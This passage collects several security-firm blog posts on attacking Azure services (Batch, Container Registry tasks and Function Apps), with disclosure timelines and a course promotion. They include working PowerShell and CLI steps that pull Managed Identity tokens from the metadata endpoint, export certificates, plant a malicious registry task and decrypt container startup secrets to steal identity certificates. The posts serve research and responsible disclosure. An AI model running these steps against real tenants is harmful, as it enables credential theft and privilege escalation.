    • Gain access to SAS tokens for Storage Account files attached to the jobs 
  • Attackers with Contributor access can: 
    • Run jobs on the batch pool nodes 
    • Generate Managed Identity tokens 
    • Gather Batch Access Keys for job execution persistence 

The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets. 

While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.

Service Background – Pools 

The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here: 

  • User-Assigned Managed Identity 
    • Can be shared across the pool to allow workers to act as a specific Managed Identity 
  • Mount configuration 
    • Using a Storage Account Key or SAS token, you can add data storage mounts to the pool 
  • Application packages 
    • These are applications/executables that you can make available to the pool 
  • Certificates 
    • This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials 

The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.

The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.

While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.

We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.
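To illustrate the impact, an attacker who recovers one of these SAS URLs (the URL below is a hypothetical example) can list and read the container contents without any Azure credentials:

# Hypothetical container SAS URL recovered from a pool's Start Task resource files
$sasUrl = "https://examplestorage.blob.core.windows.net/batchresources?sv=2022-11-02&sig=REDACTED"
# Append the list operation to enumerate the blobs exposed by the Read/List token
Invoke-RestMethod -Uri ($sasUrl + "&restype=container&comp=list")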

The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.

Service Background – Jobs

Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.). 

Generating Managed Identity Tokens from Batch

With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities. 

If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.

To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.

In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.

(Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing).Content
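As an example of wiring that call into a task, the following Az PowerShell sketch adds a token-generation task to an existing “Active” job. The account, resource group, and job names are placeholders, and the command line assumes a Linux pool with curl available:

# Get a Batch context (reading the account keys requires Contributor-level access)
$context = Get-AzBatchAccountKey -AccountName "examplebatch" -ResourceGroupName "ExampleRG"
# Task command that requests a Managed Identity token from the IMDS endpoint
$cmd = "/bin/bash -c 'curl -s -H `"Metadata: true`" `"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/`"'"
New-AzBatchTask -JobId "examplejob" -Id "token-task" -CommandLine $cmd -BatchContext $context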

To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository – https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts

If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:

Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.

Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.

Exporting Certificates from Batch Nodes

While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.

If there are certificates configured for the Pool, you can review them in the pool settings.

Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.

$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText
Get-ChildItem -Path Cert:\CurrentUser\My | ForEach-Object{ 
    try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null
    [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx'))))
    remove-item (-join($PWD,'\',$_.PSChildName,'.pfx'))
    }
    catch{}
}

Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.

$b64 = "MII…[Your Base64 Certificate Data]"
[IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))

Note that the PFX certificate uses “TotallyNotaHardcodedPassword…” as a password. You can change the password in the first line of the extraction code.

Automating Information Gathering

Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.

The function collects the following information:

  • Pools Data
    • Environment Variables
  • Start Task Commands
    • Available Storage Container URLs
  • Jobs Data
    • Environment Variables
    • Tasks (Job Preparation, Job Manager, and Job Release)
    • Jobs Sub-Tasks
    • Available Storage Container URLs
  • With Contributor Level Access
    • Primary and Secondary Keys for Triggering Jobs

While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.

Tool Usage:

Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:

PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose
VERBOSE: Logged In as kfosaaen@example.com
VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription
VERBOSE: 	1 Batch Account(s) Enumerated
VERBOSE: 		Attempting to dump data from the testspi account
VERBOSE: 			Attempting to dump keys
VERBOSE: 			1 Pool(s) Enumerated
VERBOSE: 				Attempting to dump pool data
VERBOSE: 			13 Job(s) Enumerated
VERBOSE: 				Attempting to dump job data
VERBOSE: 		Completed dumping of the testspi account

This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.

Conclusion

As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:

We determined that this behavior is considered to be ‘by design’. Please find the notes below.

Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.

In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.

References:

Automating Managed Identity Token Extraction in Azure Container Registries
https://www.netspi.com/blog/technical-blog/cloud-pentesting/automating-managed-identity-token-extraction-in-azure-container-registries/
Thu, 04 Jan 2024
Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR.

In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the “Tasks” functionality.  

This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you. 

TL;DR 

  • Azure Container Registries (ACRs) can have attached Managed Identities 
  • Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities 
  • We’ve created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path 

Previous Research 

To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.

Attack Process Overview 

Here is the general attack flow that we will be following: 

  1. The attacker has Contributor (Write) access on the ACR 
    • Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue 
  2. The attacker creates a malicious YAML task file  
    • The task authenticates to the Az CLI as the Managed Identity, then generates a token 
  3. A Task is created with the AZ CLI and the YAML file 
  4. The Task is run in the ACR Task container 
  5. The token is written to the Task output, then retrieved by the attacker 

If you want to replicate the attack using the AZ CLI, use the following steps:

  1. Authenticate to the AZ CLI (az login) with an account that has the Contributor role on the ACR. 
  2. Identify the available Container Registries with the following command: 
az acr list 
  3. Write the following YAML to a local file (.\taskfile): 
version: v1.1.0 
steps: 
  - cmd: az login --identity --allow-no-subscriptions 
  - cmd: az account get-access-token 
    • Note that this assumes you are using a System-Assigned Managed Identity. If you’re using a User-Assigned Managed Identity, you will need to add "--username <client_id|object_id|resource_id>" to the login command. 
  4. Create the task in the ACR ($ACRName) with the following command: 
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system] 
    • If you’re using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>") for the identity you want to use. 
  5. Use the following command to run the task in the ACR: 
az acr task run -n sample_acr_task -r $acrName 
    • The task output, including the token, should be displayed in the output for the run command. 
  6. Delete the task with the following command: 
az acr task delete -n sample_acr_task -r $acrName -y 

Please note that while the task may be deleted, the “Runs” of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn’t a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token. 


Invoke-AzACRTokenGenerator Usage/overview 

To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.  

A couple of things to note: 

  • The function will prompt you (via Out-GridView) for a Subscription to use and for the ACRs that you want to target 
    • Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once 
  • By default, the function generates tokens for the “Management” (https://management.azure.com/) service 
    • If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter 
    • Two commonly used options: 
      1. https://graph.microsoft.com/ – Used for accessing the Graph API
      2. https://vault.azure.net – Used for accessing the Key Vault API 
  • The output is a DataTable object that can be assigned to a variable (see the short example after this list) 
    • $tokens = Invoke-AzACRTokenGenerator 
    • This can also be appended with a “+=” to add tokens to the object 
      • This is handy for storing multiple token scopes (Management, Graph, Vault) in one object 
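
Putting those notes together, a typical collection run that gathers tokens for multiple scopes might look like the following (a minimal sketch that only uses the -TokenScope parameter described above):

# Collect Management, Key Vault, and Graph scoped tokens into one table 
$tokens  = Invoke-AzACRTokenGenerator -TokenScope "https://management.azure.com/" 
$tokens += Invoke-AzACRTokenGenerator -TokenScope "https://vault.azure.net" 
$tokens += Invoke-AzACRTokenGenerator -TokenScope "https://graph.microsoft.com/" 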

This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session: 

Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1 

Once imported, the function is simple to use: 

Invoke-AzACRTokenGenerator -Verbose 

Example Output:

Example output from Invoke-AzACRTokenGenerator showing the generated tokens.

Indicators of Compromise (IoCs) 

To better support the defenders out there, we’ve included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack. 

Operation Name – Description 

  • Microsoft.ContainerRegistry/registries/tasks/write – Create or update a task for a container registry. 
  • Microsoft.ContainerRegistry/registries/scheduleRun/action – Schedule a run against a container registry. 
  • Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action – Get the log SAS URL for a run. 
  • Microsoft.ContainerRegistry/registries/tasks/delete – Delete a task for a container registry.
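
For hunting, these operations can also be pulled back with the Az PowerShell module. This is only a rough sketch that assumes you have Reader access to the activity log; the OperationName property shape can differ between Az.Monitor versions, so treat the filter as a starting point:

# Pull the last week of activity and filter for ACR registry operations 
# (narrow the wildcard to the task/run actions listed above as needed) 
Get-AzActivityLog -StartTime (Get-Date).AddDays(-7) | 
    Where-Object { $_.OperationName.Value -like "Microsoft.ContainerRegistry/registries/*" } | 
    Select-Object EventTimestamp, Caller, @{n="Operation";e={$_.OperationName.Value}} 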

Conclusion 

The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.  

If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should review existing task files for any malicious entries and monitor the activity log actions noted above. 

The post Automating Managed Identity Token Extraction in Azure Container Registries appeared first on NetSPI.

]]>
Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  https://www.netspi.com/blog/technical-blog/cloud-pentesting/mistaken-identity-azure-function-apps/ Thu, 16 Nov 2023 15:00:00 +0000 https://www.netspi.com/mistaken-identity-azure-function-apps/ NetSPI explores extracting managed identity credentials from Azure Function Apps to expose sensitive data.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized. 

TL;DR 

  1. The Linux containers in Azure Function Apps utilize an encrypted startup context file hosted in Azure Storage Accounts
  2. The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
  3. This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of November 11, 2023, this issue has been fully addressed by Microsoft. 

In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App. 

As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.  

Here is the PowerShell sample code that we started with:

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

$encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") 

$key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) 
$iv = [System.Convert]::FromBase64String($encryptedContext[0]) 
$encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) 

$aes = [System.Security.Cryptography.AesManaged]::new() 
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC 
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 
$aes.Key = $key 
$aes.IV = $iv 

$decryptor = $aes.CreateDecryptor() 
$plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) 
$plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) 

$body =  $plainText 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
})

At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context into a variable. We then set the decryption key to the corresponding environmental variable, set the IV to the first section of the encrypted context, and complete the AES decryption, outputting the fully decrypted context to the HTTP response. 

When building this code, we used an existing Function App in our subscription that had a Managed Identity attached to it. Upon inspection of the decrypted startup context, we spotted a previously overlooked “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App. 

"MSISpecializationPayload": { 
    "SiteName": "notarealfunctionapp", 
    "MSISecret": "57[REDACTED]F9", 
    "Identities": [ 
      { 
        "Type": "SystemAssigned", 
        "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", 
        "ResourceId": "", 
        "Certificate": "MIIK[REDACTED]H0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      }, 
      { 
        "Type": "UserAssigned", 
        "ClientId": "[REDACTED]", 
        "TenantId": "[REDACTED]", 
        "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", 
        "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", 
        "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", 
        "Certificate": "MIIK[REDACTED]0A==", 
        "PrincipalId": "[REDACTED]", 
        "AuthenticationEndpoint": null 
      } 
    ], 
[Truncated]

In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data that looked like a private certificate (starting with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.  

$b64 = " MIIK[REDACTED]H0A==" 

[IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))

We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c). 

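If you would rather script the import than use the Windows certificate wizard, the built-in PKI module can load the password-less PFX directly (a minimal sketch, reusing the hypothetical C:\temp\micert.pfx path from above):

# Import the password-less PFX into the current user's certificate store 
Import-PfxCertificate -FilePath "C:\temp\micert.pfx" -CertStoreLocation Cert:\CurrentUser\My 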

After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.

PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c

Account				             SubscriptionName    TenantId       Environment
-------      				     ----------------    ---------      -----------
b1abdc5c-3e68-476a-9191-428c1300c50c         Research 	         [REDACTED]	AzureCloud

For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.

While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.
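
As a quick way to see those credential lifetimes for yourself, the service principal and its key credentials can be listed with the Az PowerShell module (a sketch; the credential property names vary a bit between Az module versions):

# Look up the Managed Identity's service principal by the client ID from the decrypted payload 
$sp = Get-AzADServicePrincipal -ApplicationId "b1abdc5c-3e68-476a-9191-428c1300c50c" 

# List the certificate credentials and their validity windows 
Get-AzADSpCredential -ObjectId $sp.Id | Select-Object KeyId, StartDateTime, EndDateTime 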

It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container; we’ve highlighted a few of those options in the talk that originated this line of research.

Conclusion / MSRC Response

At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:

  • 7/12/23 – Initial discovery of the issue and filing of the report with MSRC
  • 7/13/23 – MSRC opens Case 80917 to manage the issue
  • 8/02/23 – NetSPI requests update on status of the issue
  • 8/03/23 – Microsoft closes the case and issues the following response:
Hi Karl,
 
Thank you for your patience.
 
MSRC has investigated this issue and concluded that this does not pose an immediate threat that requires urgent attention. This is because, for an attacker or user who already has publish access, this issue did not provide any additional access than what is already available. However, the teams agree that access to relevant filesystems and other information needs to be limited.
 
The teams are working on the fix for this issue per their timelines and will take appropriate action as needed to help keep customers protected.
 
As such, this case is being closed.
 
Thank you, we absolutely appreciate your flagging this issue to us, and we look forward to more submissions from you in the future!
  • 8/03/23 – NetSPI replies, restating the issue and attempting to clarify MSRC’s understanding of the issue
  • 8/04/23 – MSRC Reopens the case, partly thanks to a thread of tweets
  • 9/11/23 – Follow up email with MSRC confirms the fix is in progress
  • 11/16/23 – NetSPI discloses the issue publicly

Microsoft’s solution for this issue was to encrypt the “MSISpecializationPayload” and rename it to “EncryptedTokenServiceSpecializationPayload”. It’s unclear how this is getting encrypted, but we were able to confirm that the key that encrypts the credentials does not exist in the container that runs the user code.

It should be noted that the decryption technique for the “CONTAINER_START_CONTEXT_SAS_URI” still works to expose the Function App keys. So, if you do manage to get code execution in a Function App container, you can still potentially use this technique to persist on the Function App.

Prior Research Note:
While doing our due diligence for this blog, we tried to find any prior research on this topic. It appears that Trend Micro also found this issue and disclosed it in June of 2022.

The post Mistaken Identity: Extracting Managed Identity Credentials from Azure Function Apps  appeared first on NetSPI.

]]>
NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence https://www.netspi.com/blog/executive-blog/personnel-development/dark-side-ops-courses-evolving-cybersecurity-excellence/ Tue, 10 Oct 2023 18:30:47 +0000 https://www.netspi.com/dark-side-ops-courses-evolving-cybersecurity-excellence/ Check out our evolved Dark Side Operations courses with a fully virtual model to evolve your cybersecurity skillset.

The post NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence appeared first on NetSPI.

]]>
Today, we are excited to introduce you to the transformed Dark Side Ops (DSO) training courses by NetSPI. With years of experience under our belt, we’ve taken our renowned DSO courses and reimagined them to offer a dynamic, self-directed approach. 

The Evolution of DSO

Traditionally, our DSO courses were conducted in-person, offering a blend of expert-led lectures and hands-on labs. However, the pandemic prompted us to adapt. We shifted to remote learning via Zoom, but we soon realized that we were missing the interactivity and personalized pace that made in-person training so impactful. 

A Fresh Approach

In response to this, we’ve reimagined DSO for the modern era. Presenting our self-directed, student-paced online courses that give you the reins to your learning journey. While preserving the exceptional content, we’ve infused a new approach that includes: 

  • Video Lectures: Engaging video presentations that bring the classroom to your screen, allowing you to learn at your convenience. 
  • Real-World Labs: Our DSO courses now enable you to create your own hands-on lab environment, bridging the gap between theory and practice. 
  • Extended Access: Say goodbye to rushed deadlines. You now have a 90-day window to complete the course at your own pace, ensuring a comfortable and comprehensive learning experience. 
  • Quality, Reimagined: We are unwavering in our commitment to upholding the highest training standards. Your DSO experience will continue to be exceptional. 
  • Save Big: For those eager to maximize their learning journey, register for all three courses and save $1,500. 

What is DSO?

DSO 1: Malware Dev Training

  • Dive deep into source code to gain a strong understanding of execution vectors, payload generation, automation, staging, command and control, and exfiltration. Intensive, hands-on labs provide even intermediate participants with a structured and challenging approach to write custom code and bypass the very latest in offensive countermeasures. 

DSO 2: Adversary Simulation Training

  • Do you want to be the best resource when the red team is out of options? Can you understand, research, build, and integrate advanced new techniques into existing toolkits? Challenge yourself to move beyond blog posts, how-tos, and simple payloads. Let’s start simulating real world threats with real world methodology. 

DSO Azure: Azure Cloud Pentesting Training 

  • Traditional penetration testing has focused on physical assets on internal and external networks. As more organizations begin to shift these assets up to cloud environments, penetration testing processes need to be updated to account for the complexities introduced by cloud infrastructure. 

Join us on this journey of continuous learning, where we’re committed to supporting you every step of the way.

Join our mailing list for more updates and remember, in the realm of cybersecurity, constant evolution is key. We are here to help you stay ahead in this ever-evolving landscape. 

The post NetSPI’s Dark Side Ops Courses: Evolving Cybersecurity Excellence appeared first on NetSPI.

]]>
Escalating Privileges with Azure Function Apps https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-function-apps/ Thu, 23 Mar 2023 13:24:36 +0000 https://www.netspi.com/azure-function-apps/ Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers.

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP.NET encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.

Identify and fix insecure Azure configurations. Explore NetSPI’s Azure Penetration Testing solutions.

Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.json?relativePath=1&api-version=2021-01-15",
    "path": "C:\home\site\wwwroot\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/HttpTrigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\home\site\wwwroot\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

